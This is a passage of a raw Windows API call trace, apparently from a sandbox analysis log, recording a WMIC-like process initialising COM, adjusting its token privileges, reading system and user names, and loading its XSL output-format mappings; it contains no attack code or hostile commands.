"LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 326 os_tid = 0x1014 [0311.664] GetModuleHandleA (lpModuleName=0x0) returned 0xa20000 [0311.664] __set_app_type (_Type=0x1) [0311.664] __p__fmode () returned 0x776f3c14 [0311.664] __p__commode () returned 0x776f49ec [0311.665] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa59af0) returned 0x0 [0311.665] __wgetmainargs (in: _Argc=0xa681a8, _Argv=0xa681ac, _Env=0xa681b0, _DoWildCard=0, _StartInfo=0xa681bc | out: _Argc=0xa681a8, _Argv=0xa681ac, _Env=0xa681b0) returned 0 [0311.665] ??0CHString@@QAE@XZ () returned 0xa685ec [0311.665] malloc (_Size=0x18) returned 0x34c0ee8 [0311.665] malloc (_Size=0x38) returned 0x34c0f08 [0311.665] malloc (_Size=0x28) returned 0x34c0f48 [0311.665] malloc (_Size=0x18) returned 0x34c0f78 [0311.665] malloc (_Size=0x24) returned 0x34c0f98 [0311.666] malloc (_Size=0x18) returned 0x34c0fc8 [0311.666] malloc (_Size=0x18) returned 0x34c0fe8 [0311.666] ??0CHString@@QAE@XZ () returned 0xa688fc [0311.666] malloc (_Size=0x18) returned 0x34c1008 [0311.666] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0311.666] SetConsoleCtrlHandler (HandlerRoutine=0xa53cc0, Add=1) returned 1 [0311.666] _onexit (_Func=0xa5f370) returned 0xa5f370 [0311.666] _onexit (_Func=0xa5f380) returned 0xa5f380 [0311.666] _onexit (_Func=0xa5f390) returned 0xa5f390 [0311.666] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0311.666] ResolveDelayLoadedAPI () returned 0x74a22590 [0311.667] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0311.675] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0311.683] CoCreateInstance (in: rclsid=0xa26a74*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa26a84*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xa68510 | out: ppv=0xa68510*=0x35b4ba8) returned 0x0 [0311.707] GetCurrentProcess () returned 0xffffffff [0311.707] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x32bfb90 | out: TokenHandle=0x32bfb90*=0x194) returned 1 [0311.708] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x32bfb8c | out: TokenInformation=0x0, ReturnLength=0x32bfb8c) returned 0 [0311.708] malloc (_Size=0x118) returned 0x34c26b0 [0311.708] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x3, TokenInformation=0x34c26b0, TokenInformationLength=0x118, ReturnLength=0x32bfb8c | out: TokenInformation=0x34c26b0, ReturnLength=0x32bfb8c) returned 1 [0311.708] AdjustTokenPrivileges (in: TokenHandle=0x194, DisableAllPrivileges=0, NewState=0x34c26b0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0311.708] free (_Block=0x34c26b0) [0311.708] CloseHandle (hObject=0x194) returned 1 [0311.708] malloc (_Size=0x40) returned 0x34c26b0 [0311.708] malloc (_Size=0x40) returned 0x34c26f8 [0311.708] malloc (_Size=0x40) returned 0x34c2740 [0311.708] SetThreadUILanguage (LangId=0x0) returned 0x30f0409 [0311.711] _vsnwprintf (in: _Buffer=0x34c2740, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x32bfb18 | out: _Buffer="ms_409") returned 6 [0311.711] malloc (_Size=0x20) returned 0x34c1200 [0311.711] GetComputerNameW (in: lpBuffer=0x34c1200, nSize=0x32bfb7c | out: lpBuffer="NQDPDE", nSize=0x32bfb7c) returned 1 [0311.711] lstrlenW (lpString="NQDPDE") returned 6 [0311.711] malloc (_Size=0xe) returned 0x34c2788 [0311.711] lstrlenW (lpString="NQDPDE") returned 6 [0311.711] ResolveDelayLoadedAPI () returned 0x7444db00 [0311.712] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x32bfb90 | out: lpNameBuffer=0x0, nSize=0x32bfb90) returned 0x30f3000 [0311.713] GetLastError () returned 0xea [0311.713] malloc (_Size=0x1e) returned 0x34c27a0 [0311.713] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x34c27a0, nSize=0x32bfb90 | out: lpNameBuffer="NQDPDE\\FD1HVy", nSize=0x32bfb90) returned 0x1 [0311.713] lstrlenW (lpString="") returned 0 [0311.713] lstrlenW (lpString="NQDPDE") returned 6 [0311.713] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0311.715] lstrlenW (lpString=".") returned 1 [0311.715] lstrlenW (lpString="NQDPDE") returned 6 [0311.715] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2=".", cchCount2=1) returned 3 [0311.715] lstrlenW (lpString="LOCALHOST") returned 9 [0311.715] lstrlenW (lpString="NQDPDE") returned 6 [0311.715] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="LOCALHOST", cchCount2=9) returned 3 [0311.715] lstrlenW (lpString="NQDPDE") returned 6 [0311.715] lstrlenW (lpString="NQDPDE") returned 6 [0311.715] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="NQDPDE", cchCount2=6) returned 2 [0311.715] free (_Block=0x34c2788) [0311.715] lstrlenW (lpString="NQDPDE") returned 6 [0311.715] malloc (_Size=0xe) returned 0x34c2788 [0311.715] lstrlenW (lpString="NQDPDE") returned 6 [0311.715] lstrlenW (lpString="NQDPDE") returned 6 [0311.715] malloc (_Size=0xe) returned 0x34c27c8 [0311.715] lstrlenW (lpString="NQDPDE") returned 6 [0311.716] malloc (_Size=0x4) returned 0x34c27e0 [0311.716] malloc (_Size=0xc) returned 0x34c27f0 [0311.716] ResolveDelayLoadedAPI () returned 0x7745b870 [0311.724] malloc (_Size=0x18) returned 0x34c2808 [0311.724] malloc (_Size=0xc) returned 0x34c2828 [0311.724] SysStringLen (param_1="IDENTIFY") returned 0x8 [0311.724] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0311.724] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0311.724] SysStringLen (param_1="IDENTIFY") returned 0x8 [0311.724] malloc (_Size=0x18) returned 0x34c2840 [0311.724] malloc (_Size=0xc) returned 0x34c2860 [0311.724] SysStringLen (param_1="IMPERSONATE") returned 0xb [0311.724] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0311.725] SysStringLen (param_1="IMPERSONATE") returned 0xb [0311.725] SysStringLen (param_1="IDENTIFY") returned 0x8 [0311.725] SysStringLen (param_1="IDENTIFY") returned 0x8 [0311.725] SysStringLen (param_1="IMPERSONATE") returned 0xb [0311.725] malloc (_Size=0x18) returned 0x34c2878 [0311.725] malloc (_Size=0xc) returned 0x34c2898 [0311.725] SysStringLen (param_1="DELEGATE") returned 0x8 [0311.725] SysStringLen (param_1="IDENTIFY") returned 0x8 [0311.725] SysStringLen (param_1="DELEGATE") returned 0x8 [0311.725] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0311.725] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0311.725] SysStringLen (param_1="DELEGATE") returned 0x8 [0311.725] malloc (_Size=0x18) returned 0x34c28b0 [0311.725] malloc (_Size=0xc) returned 0x34c28d0 [0311.725] malloc (_Size=0x18) returned 0x34c28e8 [0311.725] malloc (_Size=0xc) returned 0x34c2908 [0311.725] SysStringLen (param_1="NONE") returned 0x4 [0311.725] SysStringLen (param_1="DEFAULT") returned 0x7 [0311.725] SysStringLen (param_1="DEFAULT") returned 0x7 [0311.725] SysStringLen (param_1="NONE") returned 0x4 [0311.725] malloc (_Size=0x18) returned 0x34c2920 [0311.725] malloc (_Size=0xc) returned 0x34c2940 [0311.725] SysStringLen (param_1="CONNECT") returned 0x7 [0311.725] SysStringLen (param_1="DEFAULT") returned 0x7 [0311.725] malloc (_Size=0x18) returned 0x34c2958 [0311.725] malloc (_Size=0xc) returned 0x34c04a0 [0311.726] SysStringLen (param_1="CALL") returned 0x4 [0311.726] SysStringLen (param_1="DEFAULT") returned 0x7 [0311.726] SysStringLen (param_1="CALL") returned 0x4 [0311.726] SysStringLen (param_1="CONNECT") returned 0x7 [0311.726] malloc (_Size=0x18) returned 0x34c04b8 [0311.726] malloc (_Size=0xc) returned 0x34c04d8 [0311.726] SysStringLen (param_1="PKT") returned 0x3 [0311.726] SysStringLen (param_1="DEFAULT") returned 0x7 [0311.726] SysStringLen (param_1="PKT") returned 0x3 [0311.726] SysStringLen (param_1="NONE") returned 0x4 [0311.726] SysStringLen (param_1="NONE") returned 0x4 [0311.726] SysStringLen (param_1="PKT") returned 0x3 [0311.726] malloc (_Size=0x18) returned 0x34c2a20 [0311.726] malloc (_Size=0xc) returned 0x34c04f0 [0311.726] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0311.726] SysStringLen (param_1="DEFAULT") returned 0x7 [0311.726] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0311.726] SysStringLen (param_1="NONE") returned 0x4 [0311.726] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0311.726] SysStringLen (param_1="PKT") returned 0x3 [0311.726] SysStringLen (param_1="PKT") returned 0x3 [0311.726] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0311.726] malloc (_Size=0x18) returned 0x34c29c0 [0311.726] malloc (_Size=0xc) returned 0x34c0508 [0311.726] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0311.727] SysStringLen (param_1="DEFAULT") returned 0x7 [0311.727] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0311.727] SysStringLen (param_1="PKT") returned 0x3 [0311.727] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0311.727] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0311.727] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0311.727] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0311.727] malloc (_Size=0x18) returned 0x34c2d40 [0311.727] malloc (_Size=0x40) returned 0x34c0520 [0311.727] malloc (_Size=0x20a) returned 0x34c97c8 [0311.727] GetSystemDirectoryW (in: lpBuffer=0x34c97c8, uSize=0x105 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0311.727] free (_Block=0x34c97c8) [0311.727] malloc (_Size=0xc) returned 0x34c0568 [0311.727] malloc (_Size=0xc) returned 0x34c0580 [0311.727] malloc (_Size=0xc) returned 0x34c2d80 [0311.727] SysStringLen (param_1="C:\\WINDOWS\\system32") returned 0x13 [0311.727] SysStringLen (param_1="\\wbem\\") returned 0x6 [0311.727] free (_Block=0x34c0568) [0311.727] free (_Block=0x34c0580) [0311.727] SysStringByteLen (bstr="C:\\WINDOWS\\system32\\wbem\\") returned 0x32 [0311.727] free (_Block=0x34c2d80) [0311.727] malloc (_Size=0xc) returned 0x34c98c8 [0311.727] malloc (_Size=0xc) returned 0x34c9868 [0311.728] malloc (_Size=0xc) returned 0x34c9880 [0311.728] SysStringLen (param_1="C:\\WINDOWS\\system32\\wbem\\") returned 0x19 [0311.728] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0311.728] free (_Block=0x34c98c8) [0311.728] free (_Block=0x34c9868) [0311.728] GetCurrentThreadId () returned 0x1014 [0311.728] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x32bf6a0 | out: phkResult=0x32bf6a0*=0x1a0) returned 0x0 [0311.728] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x32bf6ac, lpcbData=0x32bf6a8*=0x400 | out: lpType=0x0, lpData=0x32bf6ac*=0x30, lpcbData=0x32bf6a8*=0x4) returned 0x0 [0311.728] _wcsicmp (_String1="0", _String2="1") returned -1 [0311.728] _wcsicmp (_String1="0", _String2="2") returned -2 [0311.728] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x32bf6a8*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x32bf6a8*=0x42) returned 0x0 [0311.728] malloc (_Size=0x86) returned 0x34c2d80 [0311.728] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x34c2d80, lpcbData=0x32bf6a8*=0x42 | out: lpType=0x0, lpData=0x34c2d80*=0x25, lpcbData=0x32bf6a8*=0x42) returned 0x0 [0311.728] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0311.728] malloc (_Size=0x42) returned 0x34c2e10 [0311.728] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0311.728] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x32bf6ac, lpcbData=0x32bf6a8*=0x400 | out: lpType=0x0, lpData=0x32bf6ac*=0x36, lpcbData=0x32bf6a8*=0xc) returned 0x0 [0311.728] _wtol (_String="65536") returned 65536 [0311.728] free (_Block=0x34c2d80) [0311.728] RegCloseKey (hKey=0x0) returned 0x6 [0311.729] CoCreateInstance (in: rclsid=0xa26ad4*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa26ae4*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x32bfb3c | out: ppv=0x32bfb3c*=0x35845a8) returned 0x0 [0311.746] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x35845a8, xmlSource=0x32bfac0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\WINDOWS\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x32bfb28 | out: isSuccessful=0x32bfb28*=0xffff) returned 0x0 [0311.945] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x35845a8, DOMElement=0x32bfb38 | out: DOMElement=0x32bfb38*=0x3586b48) returned 0x0 [0311.945] malloc (_Size=0xc) returned 0x34c97f0 [0311.946] IXMLDOMElement:getElementsByTagName (in: This=0x3586b48, tagName="XSLFORMAT", resultList=0x32bfb34 | out: resultList=0x32bfb34*=0x3589ca0) returned 0x0 [0311.947] free (_Block=0x34c97f0) [0311.947] IXMLDOMNodeList:get_length (in: This=0x3589ca0, listLength=0x32bfb30 | out: listLength=0x32bfb30*=21) returned 0x0 [0311.947] IXMLDOMNodeList:get_item (in: This=0x3589ca0, index=0, listItem=0x32bfb50 | out: listItem=0x32bfb50*=0x3586b88) returned 0x0 [0311.948] IXMLDOMNode:get_text (in: This=0x3586b88, text=0x32bfb54 | out: text=0x32bfb54*="texttable.xsl") returned 0x0 [0311.948] IXMLDOMNode:get_attributes (in: This=0x3586b88, attributeMap=0x32bfb4c | out: attributeMap=0x32bfb4c*=0x3589fa8) returned 0x0 [0311.948] malloc (_Size=0xc) returned 0x34c98c8 [0311.948] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3589fa8, name="KEYWORD", namedItem=0x32bfb48 | out: namedItem=0x32bfb48*=0x3589ff8) returned 0x0 [0311.949] free (_Block=0x34c98c8) [0311.949] IXMLDOMNode:get_nodeValue (in: This=0x3589ff8, value=0x32bfb08 | out: value=0x32bfb08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x0)) returned 0x0 [0311.949] malloc (_Size=0xc) returned 0x34c98b0 [0311.949] malloc (_Size=0xc) returned 0x34c9868 [0311.949] malloc (_Size=0x18) returned 0x34c2b00 [0311.949] IUnknown:Release (This=0x3586b88) returned 0x0 [0311.949] IUnknown:Release (This=0x3589fa8) returned 0x0 [0311.949] IUnknown:Release (This=0x3589ff8) returned 0x0 [0311.949] IXMLDOMNodeList:get_item (in: This=0x3589ca0, index=1, listItem=0x32bfb50 | out: listItem=0x32bfb50*=0x3586b88) returned 0x0 [0311.949] IXMLDOMNode:get_text (in: This=0x3586b88, text=0x32bfb54 | out: text=0x32bfb54*="textvaluelist.xsl") returned 0x0 [0311.950] IXMLDOMNode:get_attributes (in: This=0x3586b88, attributeMap=0x32bfb4c | out: attributeMap=0x32bfb4c*=0x3589fa8) returned 0x0 [0311.950] malloc (_Size=0xc) returned 0x34c98f8 [0311.950] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3589fa8, name="KEYWORD", namedItem=0x32bfb48 | out: namedItem=0x32bfb48*=0x3589ff8) returned 0x0 [0311.951] free (_Block=0x34c98f8) [0311.951] IXMLDOMNode:get_nodeValue (in: This=0x3589ff8, value=0x32bfb08 | out: value=0x32bfb08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x0)) returned 0x0 [0311.951] malloc (_Size=0xc) returned 0x34c99a0 [0311.951] malloc (_Size=0xc) returned 0x34c98f8 [0311.951] SysStringLen (param_1="VALUE") returned 0x5 [0311.951] SysStringLen (param_1="TABLE") returned 0x5 [0311.951] SysStringLen (param_1="TABLE") returned 0x5 [0311.951] SysStringLen (param_1="VALUE") returned 0x5 [0311.951] malloc (_Size=0x18) returned 0x34c2ca0 [0311.951] IUnknown:Release (This=0x3586b88) returned 0x0 [0311.951] IUnknown:Release (This=0x3589fa8) returned 0x0 [0311.951] IUnknown:Release (This=0x3589ff8) returned 0x0 [0311.952] IXMLDOMNodeList:get_item (in: This=0x3589ca0, index=2, listItem=0x32bfb50 | out: listItem=0x32bfb50*=0x3586b88) returned 0x0 [0311.952] IXMLDOMNode:get_text (in: This=0x3586b88, text=0x32bfb54 | out: text=0x32bfb54*="textvaluelist.xsl") returned 0x0 [0311.952] IXMLDOMNode:get_attributes (in: This=0x3586b88, attributeMap=0x32bfb4c | out: attributeMap=0x32bfb4c*=0x3589fa8) returned 0x0 [0311.952] malloc (_Size=0xc) returned 0x34c9808 [0311.952] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3589fa8, name="KEYWORD", namedItem=0x32bfb48 | out: namedItem=0x32bfb48*=0x3589ff8) returned 0x0 [0311.952] free (_Block=0x34c9808) [0311.952] IXMLDOMNode:get_nodeValue (in: This=0x3589ff8, value=0x32bfb08 | out: value=0x32bfb08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x0)) returned 0x0 [0311.952] malloc (_Size=0xc) returned 0x34c9988 [0311.952] malloc (_Size=0xc) returned 0x34c9910 [0311.953] SysStringLen (param_1="LIST") returned 0x4 [0311.953] SysStringLen (param_1="TABLE") returned 0x5 [0311.953] malloc (_Size=0x18) returned 0x34c29e0 [0311.953] IUnknown:Release (This=0x3586b88) returned 0x0 [0311.953] IUnknown:Release (This=0x3589fa8) returned 0x0 [0311.953] IUnknown:Release (This=0x3589ff8) returned 0x0 [0311.953] IXMLDOMNodeList:get_item (in: This=0x3589ca0, index=3, listItem=0x32bfb50 | out: listItem=0x32bfb50*=0x3586b88) returned 0x0 [0311.953] IXMLDOMNode:get_text (in: This=0x3586b88, text=0x32bfb54 | out: text=0x32bfb54*="rawxml.xsl") returned 0x0 [0311.953] IXMLDOMNode:get_attributes (in: This=0x3586b88, attributeMap=0x32bfb4c | out: attributeMap=0x32bfb4c*=0x3589fa8) returned 0x0 [0311.953] malloc (_Size=0xc) returned 0x34c9820 [0311.953] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3589fa8, name="KEYWORD", namedItem=0x32bfb48 | out: namedItem=0x32bfb48*=0x3589ff8) returned 0x0 [0311.953] free (_Block=0x34c9820) [0311.954] IXMLDOMNode:get_nodeValue (in: This=0x3589ff8, value=0x32bfb08 | out: value=0x32bfb08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x0)) returned 0x0 [0311.954] malloc (_Size=0xc) returned 0x34c9898 [0311.954] malloc (_Size=0xc) returned 0x34c9928 [0311.954] SysStringLen (param_1="RAWXML") returned 0x6 [0311.954] SysStringLen (param_1="TABLE") returned 0x5 [0311.954] SysStringLen (param_1="RAWXML") returned 0x6 [0311.954] SysStringLen (param_1="LIST") returned 0x4 [0311.954] SysStringLen (param_1="LIST") returned 0x4 [0311.954] SysStringLen (param_1="RAWXML") returned 0x6 [0311.954] malloc (_Size=0x18) returned 0x34c2a80 [0311.954] IUnknown:Release (This=0x3586b88) returned 0x0 [0311.954] IUnknown:Release (This=0x3589fa8) returned 0x0 [0311.954] IUnknown:Release (This=0x3589ff8) returned 0x0 [0311.954] IXMLDOMNodeList:get_item (in: This=0x3589ca0, index=4, listItem=0x32bfb50 | out: listItem=0x32bfb50*=0x3586b88) returned 0x0 [0311.955] IXMLDOMNode:get_text (in: This=0x3586b88, text=0x32bfb54 | out: text=0x32bfb54*="htable.xsl") returned 0x0 [0311.955] IXMLDOMNode:get_attributes (in: This=0x3586b88, attributeMap=0x32bfb4c | out: attributeMap=0x32bfb4c*=0x3589fa8) returned 0x0 [0311.955] malloc (_Size=0xc) returned 0x34c97f0 [0311.955] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3589fa8, name="KEYWORD", namedItem=0x32bfb48 | out: namedItem=0x32bfb48*=0x3589ff8) returned 0x0 [0311.955] free (_Block=0x34c97f0) [0311.955] IXMLDOMNode:get_nodeValue (in: This=0x3589ff8, value=0x32bfb08 | out: value=0x32bfb08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x0)) returned 0x0 [0311.955] malloc (_Size=0xc) returned 0x34c99b8 [0311.955] malloc (_Size=0xc) returned 0x34c97f0 [0311.955] SysStringLen (param_1="HTABLE") returned 0x6 [0311.955] SysStringLen (param_1="TABLE") returned 0x5 [0311.955] SysStringLen (param_1="HTABLE") returned 0x6 [0311.955] SysStringLen (param_1="LIST") returned 0x4 [0311.955] malloc (_Size=0x18) returned 0x34c2d60 [0311.956] IUnknown:Release (This=0x3586b88) returned 0x0 [0311.956] IUnknown:Release (This=0x3589fa8) returned 0x0 [0311.956] IUnknown:Release (This=0x3589ff8) returned 0x0 [0311.956] IXMLDOMNodeList:get_item (in: This=0x3589ca0, index=5, listItem=0x32bfb50 | out: listItem=0x32bfb50*=0x3586b88) returned 0x0 [0311.956] IXMLDOMNode:get_text (in: This=0x3586b88, text=0x32bfb54 | out: text=0x32bfb54*="hform.xsl") returned 0x0 [0311.956] IXMLDOMNode:get_attributes (in: This=0x3586b88, attributeMap=0x32bfb4c | out: attributeMap=0x32bfb4c*=0x3589fa8) returned 0x0 [0311.956] malloc (_Size=0xc) returned 0x34c9838 [0311.956] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3589fa8, name="KEYWORD", namedItem=0x32bfb48 | out: namedItem=0x32bfb48*=0x3589ff8) returned 0x0 [0311.956] free (_Block=0x34c9838) [0311.957] IXMLDOMNode:get_nodeValue (in: This=0x3589ff8, value=0x32bfb08 | out: value=0x32bfb08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x0)) returned 0x0 [0311.957] malloc (_Size=0xc) returned 0x34c9808 [0311.957] malloc (_Size=0xc) returned 0x34c98e0 [0311.957] SysStringLen (param_1="HFORM") returned 0x5 [0311.957] SysStringLen (param_1="TABLE") returned 0x5 [0311.957] SysStringLen (param_1="HFORM") returned 0x5 [0311.957] SysStringLen (param_1="LIST") returned 0x4 [0311.957] SysStringLen (param_1="HFORM") returned 0x5 [0311.957] SysStringLen (param_1="HTABLE") returned 0x6 [0311.957] malloc (_Size=0x18) returned 0x34c2cc0 [0311.957] IUnknown:Release (This=0x3586b88) returned 0x0 [0311.957] IUnknown:Release (This=0x3589fa8) returned 0x0 [0311.957] IUnknown:Release (This=0x3589ff8) returned 0x0 [0311.957] IXMLDOMNodeList:get_item (in: This=0x3589ca0, index=6, listItem=0x32bfb50 | out: listItem=0x32bfb50*=0x3586b88) returned 0x0 [0311.957] IXMLDOMNode:get_text (in: This=0x3586b88, text=0x32bfb54 | out: text=0x32bfb54*="xml.xsl") returned 0x0 [0311.958] IXMLDOMNode:get_attributes (in: This=0x3586b88, attributeMap=0x32bfb4c | out: attributeMap=0x32bfb4c*=0x3589fa8) returned 0x0 [0311.958] malloc (_Size=0xc) returned 0x34c9820 [0311.958] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3589fa8, name="KEYWORD", namedItem=0x32bfb48 | out: namedItem=0x32bfb48*=0x3589ff8) returned 0x0 [0311.958] free (_Block=0x34c9820) [0311.958] IXMLDOMNode:get_nodeValue (in: This=0x3589ff8, value=0x32bfb08 | out: value=0x32bfb08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x0)) returned 0x0 [0311.958] malloc (_Size=0xc) returned 0x34c9958 [0311.958] malloc (_Size=0xc) returned 0x34c98c8 [0311.958] SysStringLen (param_1="XML") returned 0x3 [0311.958] SysStringLen (param_1="TABLE") returned 0x5 [0311.958] SysStringLen (param_1="XML") returned 0x3 [0311.958] SysStringLen (param_1="VALUE") returned 0x5 [0311.958] SysStringLen (param_1="VALUE") returned 0x5 [0311.958] SysStringLen (param_1="XML") returned 0x3 [0311.958] malloc (_Size=0x18) returned 0x34c2a60 [0311.959] IUnknown:Release (This=0x3586b88) returned 0x0 [0311.959] IUnknown:Release (This=0x3589fa8) returned 0x0 [0311.959] IUnknown:Release (This=0x3589ff8) returned 0x0 [0311.959] IXMLDOMNodeList:get_item (in: This=0x3589ca0, index=7, listItem=0x32bfb50 | out: listItem=0x32bfb50*=0x3586b88) returned 0x0 [0311.959] IXMLDOMNode:get_text (in: This=0x3586b88, text=0x32bfb54 | out: text=0x32bfb54*="mof.xsl") returned 0x0 [0311.959] IXMLDOMNode:get_attributes (in: This=0x3586b88, attributeMap=0x32bfb4c | out: attributeMap=0x32bfb4c*=0x3589fa8) returned 0x0 [0311.959] malloc (_Size=0xc) returned 0x34c9940 [0311.959] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3589fa8, name="KEYWORD", namedItem=0x32bfb48 | out: namedItem=0x32bfb48*=0x3589ff8) returned 0x0 [0311.959] free (_Block=0x34c9940) [0311.960] IXMLDOMNode:get_nodeValue (in: This=0x3589ff8, value=0x32bfb08 | out: value=0x32bfb08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x0)) returned 0x0 [0311.960] malloc (_Size=0xc) returned 0x34c9970 [0311.960] malloc (_Size=0xc) returned 0x34c9940 [0311.960] SysStringLen (param_1="MOF") returned 0x3 [0311.960] SysStringLen (param_1="TABLE") returned 0x5 [0311.960] SysStringLen (param_1="MOF") returned 0x3 [0311.960] SysStringLen (param_1="LIST") returned 0x4 [0311.960] SysStringLen 